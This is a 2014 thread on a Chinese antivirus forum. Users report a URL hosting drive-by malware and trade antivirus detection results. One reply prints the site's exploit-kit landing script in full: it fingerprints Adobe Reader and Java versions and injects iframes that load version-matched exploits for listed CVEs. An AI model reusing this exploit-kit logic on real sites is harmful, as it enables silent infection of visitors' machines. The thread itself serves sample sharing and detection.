查看: 2107|回复: 5
收起左侧

[未鉴定] http://365958.gargon98.web.hosting-test.net/ 挂马

[复制链接]
墨家小子
发表于 2014-1-15 17:45:03 | 显示全部楼层 |阅读模式
本帖最后由 墨家小子 于 2014-1-15 17:54 编辑

sshot-1.png

Administratorupdate.rar (391.18 KB, 下载次数: 98)

评分

参与人数 1人气 +2 收起 理由
fireold + 2 過幾天給你: )

查看全部评分

Miostartos
发表于 2014-1-15 17:46:22 | 显示全部楼层
本帖最后由 STCn1000 于 2014-1-15 19:00 编辑

avast 基因启发了这个文件
可以不上报了
更新数据
第二个文件avast也基因启发了
fireold
发表于 2014-1-15 18:58:45 | 显示全部楼层
  1. function getVersion(str) {

  2.     if (str == "Acrobat") {

  3.         var a_version = new Object();
  4.         a_version.exists = false;
  5.         a_version.version = '0';

  6.         var a_detect = PluginDetect.getVersion("AdobeReader");
  7.         if (a_detect != null) {
  8.             a_version.exists = true;
  9.             var vArray = a_detect.split(",");
  10.             a_version.version = vArray[0] + vArray[1] + vArray[2];
  11.         }
  12.         return a_version;

  13.     }
  14.     if (str == "Java") {
  15.         var j_version = new Object();
  16.         j_version.exists = false;
  17.         j_version.version = '0';
  18.         j_version.build = '0';

  19.         var j_detect = PluginDetect.getVersion('Java', 'include/getJavaInfo.jar')

  20.         if (j_detect != null) {
  21.             j_version.exists = true;
  22.             var vArray = j_detect.split(",");
  23.             j_version.version = vArray[1];
  24.             j_version.build = vArray[3];
  25.         }
  26.         return j_version;
  27.     }

  28. }

  29. var FramesArray = new Array();
  30. var CurrentModule = 0;

  31. function InitializeVisitor() {
  32.     var newDIV = document.createElement("div");
  33.     newDIV.innerHTML = "<iframe src='add_visitor.php?referrer='></iframe>";
  34.     document.body.appendChild(newDIV);
  35. }

  36. function NextModule() {

  37.     var newDIV = document.createElement("div");
  38.     newDIV.innerHTML = "<iframe src='" + FramesArray[CurrentModule] + "'></iframe>";
  39.     document.body.appendChild(newDIV);

  40.     if (CurrentModule < FramesArray.length - 1) {
  41.         CurrentModule++;
  42.         setTimeout("NextModule()", 5000);
  43.     }
  44. }

  45. function AcrobatModule() {
  46.     var a_version = getVersion("Acrobat");
  47.     if (a_version.exists) {
  48.         if (a_version.version >= 800 && a_version.version < 821) {
  49.             FramesArray.push("load_module.php?e=Adobe-80-2010-0188");
  50.         } else if (a_version.version >= 900 && a_version.version < 940) {
  51.             if (a_version.version < 931) {
  52.                 FramesArray.push("load_module.php?e=Adobe-90-2010-0188");
  53.             } else if (a_version.version < 933) {
  54.                 FramesArray.push("load_module.php?e=Adobe-2010-1297");

  55.             } else if (a_version.version < 940) {
  56.                 FramesArray.push("load_module.php?e=Adobe-2010-2884");
  57.             }
  58.         } else if (a_version.version >= 700 && a_version.version < 711) {
  59.             FramesArray.push("load_module.php?e=Adobe-2008-2992");
  60.         }
  61.     }
  62. }

  63. function JavaModule() {
  64.     var j_version = getVersion("Java");
  65.     if (j_version.exists) {
  66.         if (j_version.version < 6 || (j_version.version == 6 && j_version.build < 19)) {
  67.             FramesArray.push("load_module.php?e=Java-2010-0842");


  68.         }
  69.     }
  70. }

  71. function SignedModule() {
  72.     var j_version = getVersion("Java");
  73.     if (j_version.exists) {
  74.         FramesArray.push("load_module.php?e=JavaSignedApplet");
  75.     }
  76. }

  77. InitializeVisitor();

  78. JavaModule();

  79. AcrobatModule();

  80. SignedModule();
  81. if (FramesArray.length > 0) {
  82.     NextModule();
  83. }
复制代码
whohever
发表于 2014-1-15 19:27:33 | 显示全部楼层
AVG kill、
3801187
发表于 2014-1-15 19:33:05 | 显示全部楼层
2014-01-15_193338.png
vingerlin
发表于 2014-1-16 19:43:02 | 显示全部楼层
Bitdefender blocked this page
The page you are trying to access contains Gen:Variant.Symmi.18407.
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-4 17:44 , Processed in 0.140071 second(s), 20 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表